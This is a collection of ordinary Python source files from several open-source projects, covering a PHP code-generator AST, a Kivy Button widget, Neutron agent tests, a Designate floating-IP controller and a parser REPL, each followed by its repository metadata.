if self.list_ != None:
self.list_.gen()
append(', ')
super(CommaList, self).gen()
class ArrayLiteralContentList(CommaList):
pass
class ArrayLiteralContent(BaseNode):
def __init__(self, key, val):
self.key = key
super(ArrayLiteralContent, self).__init__(val)
def gen(self):
if self.key != None:
self.key.gen()
append(' => ')
super(ArrayLiteralContent, self).gen()
class Varible(BaseNode):
def __init__(self, nsContentName, val):
self.nsContentName = nsContentName
super(Varible, self).__init__(val)
def gen(self, noDollar=False):
if self.nsContentName:
if isinstance(self.nsContentName, str):
append(self.nsContentName)
else:
self.nsContentName.gen()
append('::')
if isinstance(self.val, NsContentName):
self.val.list_ and self.val.list_.gen()
self.val = self.val.val
if self.val == '_':
return
if not (self.val.isupper() or self.val == 'class'):
noDollar or append('$')
super(Varible, self).gen()
class Assign(BaseNode):
def __init__(self, val, rightSide):
super(Assign, self).__init__(val)
self.rightSide = rightSide
def gen(self):
super(Assign, self).gen()
self.rightSide.gen()
class ArgList(CommaList):
pass
class Arg(BaseNode):
def __init__(self, exp, threeDot):
self.threeDot = threeDot
super(Arg, self).__init__(exp)
def gen(self):
self.threeDot and self.threeDot.gen()
super(Arg, self).gen()
class ParamList(CommaList):
pass
class ThreeDotModifier(BaseNode):
pass
class Param(BaseNode):
def __init__(self, ref, val, threeDot, type_, init):
self.ref = ref
super(Param, self).__init__(val)
self.threeDot = threeDot
self.type_ = type_
self.init = init
def gen(self):
self.type_.gen()
self.threeDot.gen()
self.ref.gen()
append('$')
super(Param, self).gen()
self.init.gen()
class TypeModifier(BaseNode):
def gen(self):
super(TypeModifier, self).gen()
self.val and append(' ')
class Call(BaseNode):
def __init__(self, val, args):
super(Call, self).__init__(val)
self.args = args
def gen(self):
super(Call, self).gen()
append('(')
self.args.gen()
append(')')
class Callable(BaseNode):
def __init__(self, val, id_):
super(Callable, self).__init__(val)
self.id_ = id_
def gen(self):
super(Callable, self).gen()
if self.id_:
append('::')
append(self.id_)
class Lambda(WithTerminatorNode):
def __init__(self, paramList, use, terminator, block):
super(Lambda, self).__init__(paramList, terminator)
self.use = use
self.block = block
def gen(self):
append('function (')
super(Lambda, self).gen()
append(') ')
self.use.gen()
append('{ ')
self.terminator.gen()
append('\n')
self.block.gen()
append([indentSpaces(), '}'])
class UseModifier(BaseNode):
def __init__(self, paramList):
super(UseModifier, self).__init__(paramList)
def gen(self):
if not self.val:
return
append('use (')
super(UseModifier, self).gen()
append(')')
class Terminator(BaseNode):
pass
class Namespace(BaseNode):
def gen(self):
append('namespace ')
super(Namespace, self).gen()
class UseNamespace(BaseNode):
def gen(self):
append('use ')
super(UseNamespace, self).gen()
class DefOrConstModifier(BaseNode):
def gen(self):
if not self.val:
return
if self.val == 'def':
self.val = 'function'
super(DefOrConstModifier, self).gen()
append(' ')
class NsContentName(BaseNode):
def __init__(self, list_, val):
super(NsContentName, self).__init__(val)
self.list_ = list_
def gen(self):
self.list_ and self.list_.gen()
super(NsContentName, self).gen()
class NsContentNameList(CommaList):
pass
class NsContentNameAsId(BaseNode):
def __init__(self, defOrConst, val, id_):
self.defOrConst = defOrConst
super(NsContentNameAsId, self).__init__(val)
self.id_ = id_
def gen(self):
self.defOrConst.gen()
super(NsContentNameAsId, self).gen()
self.id_ and append([' as ', self.id_])
class NsContentNameAsIdList(CommaList):
pass
class If(WithTerminatorNode):
def __init__(self, val, elseBlock, terminator):
super(If, self).__init__(val, terminator)
self.elseBlock = elseBlock
def gen(self):
super(If, self).gen()
if self.elseBlock:
append(' else { ')
self.terminator.gen()
append('\n')
self.elseBlock.gen()
append([indentSpaces(), '}'])
class IfBlock(WithTerminatorNode):
def __init__(self, list_, exp, terminator, block):
super(IfBlock, self).__init__(exp, terminator)
self.list_ = list_
self.block = block
def gen(self):
if self.list_ != None:
self.list_.gen()
append(' else if (')
else:
append('if (')
super(IfBlock, self).gen()
append(') { ')
self.terminator.gen()
append('\n')
self.block.gen()
append([indentSpaces(), '}'])
class Switch(WithTerminatorNode):
def __init__(self, exp, terminator, content):
super(Switch, self).__init__(exp, terminator)
self.content = content
def gen(self):
append('switch (')
super(Switch, self).gen()
append(') { ')
self.terminator.gen()
append('\n')
self.content.gen()
append([indentSpaces(), '}'])
class SwitchContent(Block):
pass
class InSwitchDefList(Body):
pass
class InSwitchDef(Line):
pass
class Case(WithTerminatorNode):
def __init__(self, case, valueList, terminator, block):
super(Case, self).__init__(case, terminator)
self.valueList = valueList
self.block = block
def gen(self):
if self.val == 'case':
valueList = []
while (self.valueList):
valueList.append(self.valueList.val)
self.valueList = self.valueList.list_
valueList.reverse()
popStr()
for value in valueList:
append([indentSpaces(), 'case '])
value.gen()
append([': ', '\n'])
popStr()
self.terminator.gen()
append('\n')
self.block.gen()
indent()
append([indentSpaces(), 'break; ', '\n'])
outdent()
else:
append('default: ')
self.terminator.gen()
append('\n')
self.block.gen()
popStr()
class For(WithTerminatorNode):
def __init__(self, exp1, exp2, exp3, terminator, block):
super(For, self).__init__(exp3, terminator)
self.exp1 = exp1
self.exp2 = exp2
self.block = block
def gen(self):
append('foreach (')
super(For, self).gen()
append(' as ')
self.exp1.gen()
if self.exp2:
append(' => ')
self.exp2.gen()
append(') { ')
self.terminator.gen()
append('\n')
self.block.gen()
append([indentSpaces(), '}'])
class While(WithTerminatorNode):
def __init__(self, exp, terminator, block):
super(While, self).__init__(exp, terminator)
self.block = block
def gen(self):
append('while (')
super(While, self).gen()
append(') { ')
self.terminator.gen()
append('\n')
self.block.gen()
append([indentSpaces(), '}'])
class DoWhile(WithTerminatorNode):
def __init__(self, term1, block, cmtOrEptList, exp, term2):
super(DoWhile, self).__init__(exp, term1)
self.block = block
self.term2 = term2
self.cmtOrEptList = cmtOrEptList
def gen(self):
append('do { ')
self.terminator.gen()
append('\n')
self.block.gen()
indent()
self.cmtOrEptList.gen()
outdent()
append([indentSpaces(), '} while('])
super(DoWhile, self).gen()
append('); ')
self.term2.gen()
class CommentOrEmptyLineList(Body):
pass
class Declare(BaseNode):
def __init__(self, id_, exp):
super(Declare, self).__init__(id_)
self.exp = exp
def gen(self):
append('declare(')
super(Declare, self).gen()
append(' = ')
self.exp.gen()
append(')')
class CommentOrEmptyLine(Line):
pass
class Try(WithTerminatorNode):
def __init__(self, tryTerm, tryBlock, catch, finTerm, finBlock):
super(Try, self).__init__(tryBlock, tryTerm)
self.catch = catch
self.finTerm = finTerm
self.finBlock = finBlock
def gen(self):
append('try { ')
self.terminator.gen()
append('\n')
super(Try, self).gen()
append([indentSpaces(), '} '])
self.catch.gen()
if self.finTerm:
append('finally { ')
self.finTerm.gen()
append('\n')
self.finBlock.gen()
append([indentSpaces(), '}'])
class Catch(WithTerminatorNode):
def __init__(self, catch, var, className, terminator, block):
super(Catch, self).__init__(var, terminator)
self.catch = catch
self.className = className
self.block = block
def gen(self):
if self.catch:
self.catch.gen()
append('catch (')
self.className.gen()
append(' ')
super(Catch, self).gen()
append(') { ')
self.terminator.gen()
append('\n')
self.block.gen()
append([indentSpaces(), '} '])
class Class(WithTerminatorNode):
def __init__(self, abstract, final, id_, extends, implements, terminator, content):
self.abstract = abstract
self.final = final
super(Class, self).__init__(id_, terminator)
self.extends = extends
self.implements = implements
self.content = content
def gen(self):
self.abstract.gen()
self.final.gen()
append('class ')
super(Class, self).gen()
self.extends.gen()
self.implements.gen()
append(' { ')
self.terminator.gen()
append('\n')
self.content.gen()
append([indentSpaces(), '}'])
class AnonymousClass(WithTerminatorNode):
    def __init__(self, argList, extends, implements, terminator, content):
        super(AnonymousClass, self).__init__(argList, terminator)
self.extends = extends
self.implements = implements
self.content = content
def gen(self):
append('new class (')
super(AnonymousClass, self).gen()
append(')')
self.extends.gen()
self.implements.gen()
append(' { ')
self.terminator.gen()
append('\n')
self.content.gen()
append([indentSpaces(), '}'])
class Trait(WithTerminatorNode):
def __init__(self, id_, terminator, content):
super(Trait, self).__init__(id_, terminator)
self.content = content
def gen(self):
append('trait ')
super(Trait, self).gen()
append(' { ')
self.terminator.gen()
append('\n')
self.content.gen()
append([indentSpaces(), '}'])
class JustStrModifier(BaseNode):
def gen(self):
super(JustStrModifier, self).gen()
self.val and append(' ')
class AbstractModifier(JustStrModifier):
pass
class FinalModifier(JustStrModifier):
pass
class ClassContent(Block):
pass
class InClassDefList(Body):
pass
class InClassDef(BaseNode):
def __init__(self, abstract, val):
self.abstract = abstract
super(InClassDef, self).__init__(val)
def gen(self):
append(indentSpaces())
self.abstract and append([self.abstract, ' '])
super(InClassDef, self).gen()
append('\n')
class UseTrait(WithTerminatorNode):
def __init__(self, use, terminator, content):
super(UseTrait, self).__init__(use, terminator)
self.content = content
def gen(self):
super(UseTrait, self).gen()
if self.content:
append(' { ')
self.terminator.gen()
append('\n')
self.content.gen()
append([indentSpaces(), '}'])
else:
append('; ')
self.terminator.gen()
class UseTraitContent(Block):
pass
class InUseTraitDefList(Body):
pass
class InUseTraitDef(BaseNode):
def __init__(self, var, type_, access, ns, terminator):
super(InUseTraitDef, self).__init__(var)
self.type_ = type_
self.access = access
self.ns = ns
self.terminator = terminator
def gen(self):
append(indentSpaces())
self.val.gen(True)
append([' ', self.type_, ' '])
if self.access:
self.access.gen()
if self.ns:
self.ns.gen()
else:
popStr()
append('; ')
self.terminator.gen()
append('\n')
class Interface(WithTerminatorNode):
def __init__(self, id_, extends, terminator, content):
super(Interface, self).__init__(id_, terminator)
self.extends = extends
self.terminator = terminator
self.content = content
def gen(self):
append(['interface ', self.val])
self.extends.gen()
append(' { ')
self.terminator.gen()
append('\n')
self.content.gen()
append([indentSpaces(), '}'])
class InterfaceContent(Block):
pass
class InterfaceDefList(Body):
pass
class InterfaceDef(Line):
pass
class ExtendsModifier(BaseNode):
def gen(self):
if not self.val:
return
append(' extends ')
super(ExtendsModifier, self).gen()
class ImplementsModifier(BaseNode):
def gen(self):
if not self.val:
return
append(' implements ')
super(ImplementsModifier, self).gen()
class AccessModifier(JustStrModifier):
def gen(self, defaultPublic=False):
if defaultPublic and self.val == None:
self.val = 'public'
super(AccessModifier, self).gen()
class StaticModifier(JustStrModifier):
pass
class RefModifier(BaseNode):
pass
class MemberFuncDecWithoutTerminator(BaseNode):
def __init__(self, final, access, static, ref, id_, paramList):
super(MemberFuncDecWithoutTerminator, self).__init__(id_)
self.final = final
self.access = access
self.static = static
self.ref = ref
self.paramList = paramList
def gen(self):
self.final.gen()
self.access.gen()
self.static.gen()
self.ref.gen()
append('function ')
super(MemberFuncDecWithoutTerminator, self).gen()
append('(')
self.paramList.gen()
append(')')
class MemberFuncDec(WithTerminatorNode):
def __init__(self, func, returnType, terminator):
super(MemberFuncDec, self).__init__(func, terminator)
self.returnType = returnType
def gen(self):
super(MemberFuncDec, self).gen()
self.returnType.gen()
append('; ')
self.terminator.gen()
class ReturnTypeModifierForDec(BaseNode):
def gen(self):
if not self.val:
return
append(': ')
super(ReturnTypeModifierForDec, self).gen()
append(' ')
class MemberFuncDef(WithTerminatorNode):
def __init__(self, val, returnType, terminator, block):
super(MemberFuncDef, self).__init__(val, terminator)
self.block = block
self.returnType = returnType
def gen(self):
super(MemberFuncDef, self).gen()
self.returnType.gen()
append(' { ')
self.terminator.gen()
append('\n')
self.block.gen()
append([indentSpaces(), '}'])
class DataMemberDef(WithTerminatorNode):
def __init__(self, access, static, ref, id_, init, terminator):
super(DataMemberDef, self).__init__(id_, terminator)
self.access = access
self.static = static
self.init = init
self.ref = ref
def gen(self):
self.access.gen(True)
self.static.gen()
self.ref.gen()
if not self.val.isupper():
append('$')
super(DataMemberDef, self).gen()
self.init.gen()
append('; ')
self.terminator.gen()
class ReturnTypeModifier(BaseNode):
def gen(self):
if self.val:
append(': ')
self.val.gen()
class FuncDef(WithTerminatorNode):
def __init__(self, ref, id_, paramList, returnType, terminator, block):
self.ref = ref
super(FuncDef, self).__init__(id_, terminator)
self.paramList = paramList
self.returnType = returnType
self.block = block
def gen(self):
append('function ')
self.ref.gen()
super(FuncDef, self).gen()
append('(')
self.paramList.gen()
append(')')
self.returnType.gen()
append(' { ')
self.terminator.gen()
append('\n')
self.block.gen()
append([indentSpaces(), '}'])
class ConstDefWithoutTerminator(BaseNode):
def __init__(self, id_, assignRightSide):
super(ConstDefWithoutTerminator, self).__init__(id_)
self.assignRightSide = assignRightSide
def gen(self):
append('const ')
super(ConstDefWithoutTerminator, self).gen()
self.assignRightSide.gen()
class ConstDef(WithTerminatorNode):
def gen(self):
super(ConstDef, self).gen()
append('; ')
self.terminator.gen()
class Yield(BaseNode):
def __init__(self, exp1, exp2):
super(Yield, self).__init__(exp1)
self.exp2 = exp2
def gen(self):
append('yield')
self.val and append(' ')
super(Yield, self).gen()
if self.exp2:
append(' => ')
self.exp2.gen()
class GlobalDec(BaseNode):
def gen(self):
append('global ')
super(GlobalDec, self).gen()
class GlobalVaribleList(CommaList):
def gen(self):
if self.list_ != None:
self.list_.gen()
append(', ')
# append('$')
super(CommaList, self).gen()
class Operation(BaseNode):
pass
class StrCat(BinaryOperationNode):
pass
class UMath(UnaryOperationNode):
pass
class BMath(BinaryOperationNode):
pass
class Cast(UnaryOperationNode):
pass
class InDecrement(UnaryOperationNode):
def __init__(self, op, exp, back):
super(InDecrement, self).__init__(op, exp)
self.back = back
def gen(self):
if self.back == True:
self.exp.gen()
append(self.val)
else:
super(InDecrement, self).gen()
class UBit(UnaryOperationNode):
pass
class BBit(BinaryOperationNode):
pass
class InstanceOf(BinaryOperationNode):
pass
class ULogic(UnaryOperationNode):
pass
class BLogic(BinaryOperationNode):
pass
class NewOrClone(BaseNode):
def __init__(self, newOrClone, nsContentName, argList, varible):
super(NewOrClone, self).__init__(nsContentName)
self.argList = argList
self.varible = varible
self.newOrClone = newOrClone
def gen(self):
append(self.newOrClone)
append(' ')
if self.argList:
super(NewOrClone, self).gen()
append('(')
self.argList.gen()
append(')')
else:
if isinstance(self.varible, str):
append(self.varible)
else:
self.varible.gen()
class Compare(BinaryOperationNode):
pass
class Ternary(BaseNode):
def __init__(self, exp1, exp2, exp3):
super(Ternary, self).__init__(exp1)
self.exp2 = exp2
self.exp3 = exp3
def gen(self):
super(Ternary, self).gen()
append(' ? ')
self.exp2.gen()
append(' : ')
self.exp3.gen()
class At(UnaryOperationNode):
pass
class Ref(UnaryOperationNode):
pass
|
{
"content_hash": "2f55e769d8b8fe8381c2025e46df91e0",
"timestamp": "",
"source": "github",
"line_count": 1152,
"max_line_length": 87,
"avg_line_length": 22.489583333333332,
"alnum_prop": 0.553960166743863,
"repo_name": "zxylvlp/PingPHP",
"id": "cb25aba9e6142f3b37be94bc933dae340450e527",
"size": "25926",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "pingphp/nodes.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "PHP",
"bytes": "206876"
},
{
"name": "Python",
"bytes": "73496"
},
{
"name": "Shell",
"bytes": "320"
}
],
"symlink_target": ""
}
|
'''
Button
======
.. image:: images/button.jpg
:align: right
The :class:`Button` is a :class:`~kivy.uix.label.Label` with associated actions
that are triggered when the button is pressed (or released after a
click/touch). To configure the button, the same properties (padding,
font_size, etc) and
:ref:`sizing system <kivy-uix-label-sizing-and-text-content>`
are used as for the :class:`~kivy.uix.label.Label` class::
button = Button(text='Hello world', font_size=14)
To attach a callback when the button is pressed (clicked/touched), use
:class:`~kivy.uix.widget.Widget.bind`::
def callback(instance):
print('The button <%s> is being pressed' % instance.text)
btn1 = Button(text='Hello world 1')
btn1.bind(on_press=callback)
btn2 = Button(text='Hello world 2')
btn2.bind(on_press=callback)
If you want to be notified every time the button state changes, you can bind
to the :attr:`Button.state` property::
def callback(instance, value):
print('My button <%s> state is <%s>' % (instance, value))
btn1 = Button(text='Hello world 1')
btn1.bind(state=callback)
Kv Example::
Button:
text: 'press me'
on_press: print("ouch! More gently please")
on_release: print("ahhh")
on_state:
print("my current state is {}".format(self.state))
'''
__all__ = ('Button', )
from kivy.uix.label import Label
from kivy.properties import StringProperty, ListProperty, ColorProperty
from kivy.uix.behaviors import ButtonBehavior
class Button(ButtonBehavior, Label):
'''Button class, see module documentation for more information.
.. versionchanged:: 1.8.0
The behavior / logic of the button has been moved to
:class:`~kivy.uix.behaviors.ButtonBehaviors`.
'''
background_color = ColorProperty([1, 1, 1, 1])
'''Background color, in the format (r, g, b, a).
This acts as a *multiplier* to the texture colour. The default
texture is grey, so just setting the background color will give
a darker result. To set a plain color, set the
:attr:`background_normal` to ``''``.
.. versionadded:: 1.0.8
The :attr:`background_color` is a
:class:`~kivy.properties.ColorProperty` and defaults to [1, 1, 1, 1].
.. versionchanged:: 2.0.0
Changed from :class:`~kivy.properties.ListProperty` to
:class:`~kivy.properties.ColorProperty`.
'''
background_normal = StringProperty(
'atlas://data/images/defaulttheme/button')
'''Background image of the button used for the default graphical
representation when the button is not pressed.
.. versionadded:: 1.0.4
:attr:`background_normal` is a :class:`~kivy.properties.StringProperty`
and defaults to 'atlas://data/images/defaulttheme/button'.
'''
background_down = StringProperty(
'atlas://data/images/defaulttheme/button_pressed')
'''Background image of the button used for the default graphical
representation when the button is pressed.
.. versionadded:: 1.0.4
:attr:`background_down` is a :class:`~kivy.properties.StringProperty` and
defaults to 'atlas://data/images/defaulttheme/button_pressed'.
'''
background_disabled_normal = StringProperty(
'atlas://data/images/defaulttheme/button_disabled')
'''Background image of the button used for the default graphical
representation when the button is disabled and not pressed.
.. versionadded:: 1.8.0
:attr:`background_disabled_normal` is a
:class:`~kivy.properties.StringProperty` and defaults to
'atlas://data/images/defaulttheme/button_disabled'.
'''
background_disabled_down = StringProperty(
'atlas://data/images/defaulttheme/button_disabled_pressed')
'''Background image of the button used for the default graphical
representation when the button is disabled and pressed.
.. versionadded:: 1.8.0
:attr:`background_disabled_down` is a
:class:`~kivy.properties.StringProperty` and defaults to
'atlas://data/images/defaulttheme/button_disabled_pressed'.
'''
border = ListProperty([16, 16, 16, 16])
'''Border used for :class:`~kivy.graphics.vertex_instructions.BorderImage`
graphics instruction. Used with :attr:`background_normal` and
:attr:`background_down`. Can be used for custom backgrounds.
It must be a list of four values: (bottom, right, top, left). Read the
BorderImage instruction for more information about how to use it.
:attr:`border` is a :class:`~kivy.properties.ListProperty` and defaults to
(16, 16, 16, 16)
'''
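if __name__ == '__main__':
    # Minimal usage sketch, not part of this module: it illustrates the note
    # above that background_color multiplies the default grey texture, so
    # clearing background_normal yields a flat colour instead of a tint.
    # The app class name below is made up for the demo; a working Kivy
    # install is assumed.
    from kivy.app import App
    class _FlatButtonDemo(App):
        def build(self):
            return Button(text='flat red',
                          background_normal='',
                          background_color=(1, 0, 0, 1))
    _FlatButtonDemo().run()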
|
{
"content_hash": "bd46ca99dec3d55156f961e96a7ab073",
"timestamp": "",
"source": "github",
"line_count": 137,
"max_line_length": 79,
"avg_line_length": 33.56204379562044,
"alnum_prop": 0.6846454980426272,
"repo_name": "matham/kivy",
"id": "96123c668bb00c8031acc1744355814a3989f2e1",
"size": "4598",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "kivy/uix/button.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "324418"
},
{
"name": "C++",
"bytes": "3888"
},
{
"name": "Emacs Lisp",
"bytes": "9838"
},
{
"name": "GLSL",
"bytes": "323"
},
{
"name": "Makefile",
"bytes": "4993"
},
{
"name": "Objective-C",
"bytes": "21550"
},
{
"name": "PowerShell",
"bytes": "5375"
},
{
"name": "Python",
"bytes": "4204346"
},
{
"name": "Shell",
"bytes": "25365"
},
{
"name": "Vim script",
"bytes": "2120"
}
],
"symlink_target": ""
}
|
class Serie():
"""Model of a TV serie."""
pass
|
{
"content_hash": "a24c8c370b368b8306694fef20e3cb75",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 30,
"avg_line_length": 18.333333333333332,
"alnum_prop": 0.5272727272727272,
"repo_name": "Rolinh/pydeo",
"id": "ed00f28b2e827409361ecd78c07eb094f063a7cd",
"size": "55",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pydeo/app/models/serie.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "937"
},
{
"name": "JavaScript",
"bytes": "5506"
},
{
"name": "Python",
"bytes": "37158"
}
],
"symlink_target": ""
}
|
import copy
import time
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import timeutils
from webob import exc
from neutron.api.v2 import attributes
from neutron.common import constants
from neutron import context
from neutron.db import agents_db
from neutron.db import db_base_plugin_v2
from neutron.extensions import agent
from neutron.openstack.common import uuidutils
from neutron.tests.common import helpers
from neutron.tests import tools
from neutron.tests.unit.api.v2 import test_base
from neutron.tests.unit.db import test_db_base_plugin_v2
LOG = logging.getLogger(__name__)
_uuid = uuidutils.generate_uuid
_get_path = test_base._get_path
L3_HOSTA = 'hosta'
DHCP_HOSTA = 'hosta'
L3_HOSTB = 'hostb'
DHCP_HOSTC = 'hostc'
LBAAS_HOSTA = 'hosta'
LBAAS_HOSTB = 'hostb'
class AgentTestExtensionManager(object):
def get_resources(self):
# Add the resources to the global attribute map
# This is done here as the setup process won't
# initialize the main API router which extends
# the global attribute map
attributes.RESOURCE_ATTRIBUTE_MAP.update(
agent.RESOURCE_ATTRIBUTE_MAP)
return agent.Agent.get_resources()
def get_actions(self):
return []
def get_request_extensions(self):
return []
# This plugin class is just for testing
class TestAgentPlugin(db_base_plugin_v2.NeutronDbPluginV2,
agents_db.AgentDbMixin):
supported_extension_aliases = ["agent"]
class AgentDBTestMixIn(object):
def _list_agents(self, expected_res_status=None,
neutron_context=None,
query_string=None):
agent_res = self._list('agents',
neutron_context=neutron_context,
query_params=query_string)
if expected_res_status:
self.assertEqual(agent_res.status_int, expected_res_status)
return agent_res
def _register_agent_states(self, lbaas_agents=False):
"""Register two L3 agents and two DHCP agents."""
l3_hosta = helpers._get_l3_agent_dict(
L3_HOSTA, constants.L3_AGENT_MODE_LEGACY)
l3_hostb = helpers._get_l3_agent_dict(
L3_HOSTB, constants.L3_AGENT_MODE_LEGACY)
dhcp_hosta = helpers._get_dhcp_agent_dict(DHCP_HOSTA)
dhcp_hostc = helpers._get_dhcp_agent_dict(DHCP_HOSTC)
helpers.register_l3_agent(host=L3_HOSTA)
helpers.register_l3_agent(host=L3_HOSTB)
helpers.register_dhcp_agent(host=DHCP_HOSTA)
helpers.register_dhcp_agent(host=DHCP_HOSTC)
res = [l3_hosta, l3_hostb, dhcp_hosta, dhcp_hostc]
if lbaas_agents:
lbaas_hosta = {
'binary': 'neutron-loadbalancer-agent',
'host': LBAAS_HOSTA,
'topic': 'LOADBALANCER_AGENT',
'configurations': {'device_drivers': ['haproxy_ns']},
'agent_type': constants.AGENT_TYPE_LOADBALANCER}
lbaas_hostb = copy.deepcopy(lbaas_hosta)
lbaas_hostb['host'] = LBAAS_HOSTB
callback = agents_db.AgentExtRpcCallback()
callback.report_state(self.adminContext,
agent_state={'agent_state': lbaas_hosta},
time=timeutils.strtime())
callback.report_state(self.adminContext,
agent_state={'agent_state': lbaas_hostb},
time=timeutils.strtime())
res += [lbaas_hosta, lbaas_hostb]
return res
class AgentDBTestCase(AgentDBTestMixIn,
test_db_base_plugin_v2.NeutronDbPluginV2TestCase):
fmt = 'json'
def setUp(self):
plugin = 'neutron.tests.unit.extensions.test_agent.TestAgentPlugin'
# for these tests we need to enable overlapping ips
cfg.CONF.set_default('allow_overlapping_ips', True)
self.useFixture(tools.AttributeMapMemento())
ext_mgr = AgentTestExtensionManager()
super(AgentDBTestCase, self).setUp(plugin=plugin, ext_mgr=ext_mgr)
self.adminContext = context.get_admin_context()
def test_create_agent(self):
data = {'agent': {}}
_req = self.new_create_request('agents', data, self.fmt)
_req.environ['neutron.context'] = context.Context(
'', 'tenant_id')
res = _req.get_response(self.ext_api)
self.assertEqual(res.status_int, exc.HTTPBadRequest.code)
def test_list_agent(self):
agents = self._register_agent_states()
res = self._list('agents')
self.assertEqual(len(agents), len(res['agents']))
def test_show_agent(self):
self._register_agent_states()
agents = self._list_agents(
query_string='binary=neutron-l3-agent')
self.assertEqual(2, len(agents['agents']))
agent = self._show('agents', agents['agents'][0]['id'])
self.assertEqual('neutron-l3-agent', agent['agent']['binary'])
def test_update_agent(self):
self._register_agent_states()
agents = self._list_agents(
query_string='binary=neutron-l3-agent&host=' + L3_HOSTB)
self.assertEqual(1, len(agents['agents']))
com_id = agents['agents'][0]['id']
agent = self._show('agents', com_id)
new_agent = {}
new_agent['agent'] = {}
new_agent['agent']['admin_state_up'] = False
new_agent['agent']['description'] = 'description'
self._update('agents', com_id, new_agent)
agent = self._show('agents', com_id)
self.assertFalse(agent['agent']['admin_state_up'])
self.assertEqual('description', agent['agent']['description'])
def test_dead_agent(self):
cfg.CONF.set_override('agent_down_time', 1)
self._register_agent_states()
time.sleep(1.5)
agents = self._list_agents(
query_string='binary=neutron-l3-agent&host=' + L3_HOSTB)
self.assertFalse(agents['agents'][0]['alive'])
|
{
"content_hash": "b917ef8012cf508688d28b118630494f",
"timestamp": "",
"source": "github",
"line_count": 161,
"max_line_length": 75,
"avg_line_length": 37.559006211180126,
"alnum_prop": 0.6194807342483877,
"repo_name": "NeCTAR-RC/neutron",
"id": "abc28b9aaf45dd2c81ca03b46bc4050434e5f314",
"size": "6688",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "neutron/tests/unit/extensions/test_agent.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "980"
},
{
"name": "Python",
"bytes": "7228162"
},
{
"name": "Shell",
"bytes": "12807"
}
],
"symlink_target": ""
}
|
import pecan
import re
from designate import exceptions
from designate import schema
from designate.api.v2.controllers import rest
from designate.api.v2.views import floatingips as floatingips_views
from designate.central import rpcapi as central_rpcapi
central_api = central_rpcapi.CentralAPI()
FIP_REGEX = '^(?P<region>[A-Za-z0-9\\.\\-_]{1,100}):' \
'(?P<id>[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-' \
'[0-9a-fA-F]{4}-[0-9a-fA-F]{12})$'
def fip_key_to_data(key):
m = re.match(FIP_REGEX, key)
# NOTE: Ensure that the fip matches region:floatingip_id or raise, if
# not this will cause a 500.
if m is None:
msg = 'Floating IP %s is not in the format of <region>:<uuid>'
raise exceptions.BadRequest(msg % key)
return m.groups()
class FloatingIPController(rest.RestController):
_view = floatingips_views.FloatingIPView()
_resource_schema = schema.Schema('v2', 'floatingip')
_collection_schema = schema.Schema('v2', 'floatingips')
@pecan.expose(template='json:', content_type='application/json')
def get_all(self, **params):
""" List Floating IP PTRs for a Tenant """
request = pecan.request
context = request.environ['context']
fips = central_api.list_floatingips(context)
return self._view.list(context, request, fips)
@pecan.expose(template='json:', content_type='application/json')
def patch_one(self, fip_key):
"""
Set or unset a PTR
"""
request = pecan.request
context = request.environ['context']
body = request.body_dict
region, id_ = fip_key_to_data(fip_key)
# Validate the request conforms to the schema
self._resource_schema.validate(body)
fip = central_api.update_floatingip(
context, region, id_, body['floatingip'])
if fip:
return self._view.show(context, request, fip)
@pecan.expose(template='json:', content_type='application/json')
def get_one(self, fip_key):
"""
Get PTR
"""
request = pecan.request
context = request.environ['context']
region, id_ = fip_key_to_data(fip_key)
fip = central_api.get_floatingip(context, region, id_)
return self._view.show(context, request, fip)
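if __name__ == '__main__':
    # Illustrative sketch only, not part of the designate API: it shows how
    # fip_key_to_data() splits a '<region>:<uuid>' key as described in the
    # NOTE above. The region name and UUID below are made-up example values.
    print(fip_key_to_data('RegionOne:12345678-1234-1234-1234-123456789abc'))
    # -> ('RegionOne', '12345678-1234-1234-1234-123456789abc')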
|
{
"content_hash": "92c29caa22f3f940148a60f9caeb19be",
"timestamp": "",
"source": "github",
"line_count": 75,
"max_line_length": 73,
"avg_line_length": 31.04,
"alnum_prop": 0.625,
"repo_name": "NeCTAR-RC/designate",
"id": "ae373b7f140a7adc9da66143b758c54f56401044",
"size": "2983",
"binary": false,
"copies": "1",
"ref": "refs/heads/nectar/icehouse",
"path": "designate/api/v2/controllers/floatingips.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1402878"
},
{
"name": "Shell",
"bytes": "3809"
}
],
"symlink_target": ""
}
|
import cmd
import os
import sys
import time
import traceback
from typing import Optional, List, Iterator, Tuple, Dict
from pyramids.categorization import Category
from pyramids.model import Model
from pyramids.rules.parse_rule import ParseRule
try:
from graphviz import Digraph
except ImportError:
Digraph = None
from pyramids.grammar import GrammarParser
from pyramids.trees import Parse, TreeNodeSet, ParseTreeUtils
try:
# noinspection PyPep8Naming
import cProfile as profile
except ImportError:
import profile
from pyramids.batching import Attempt, Result, ModelBatchController, FeedbackReceiver, Failure
from pyramids.config import ModelConfig
from pyramids.loader import ModelLoader
from pyramids.parsing import ParsingAlgorithm
from pyramids.generation import GenerationAlgorithm
from pyramids.sample_utils import Input, Target, SampleSet, SampleUtils
__author__ = 'Aaron Hosford'
__all__ = [
'ParserCmd',
'repl',
]
function_to_profile = None
class ParserCmd(cmd.Cmd):
def __init__(self, model_loader: ModelLoader):
cmd.Cmd.__init__(self)
self._model_loader = model_loader
self._model = model_loader.load_model()
self.prompt = '% '
self._simple = True
self._show_broken = False
self._parser_state = None
self._parses = [] # type: List[Parse]
self._whole_parses = 0
self._parse_index = 0
self._fast = False
self._timeout_interval = 5
self._emergency_mode = False
self._benchmark_path = None
self._benchmark: Optional[SampleSet] = None
self._benchmark_dirty = False
self._benchmark_emergency_disambiguations = 0
self._benchmark_parse_timeouts = 0
self._benchmark_disambiguation_timeouts = 0
self._benchmark_time = 0.0
self._benchmark_tests_completed = 0
self._benchmark_update_time = time.time()
self._last_input_text = None
self.do_load()
@property
def model(self) -> Model:
return self._model
@property
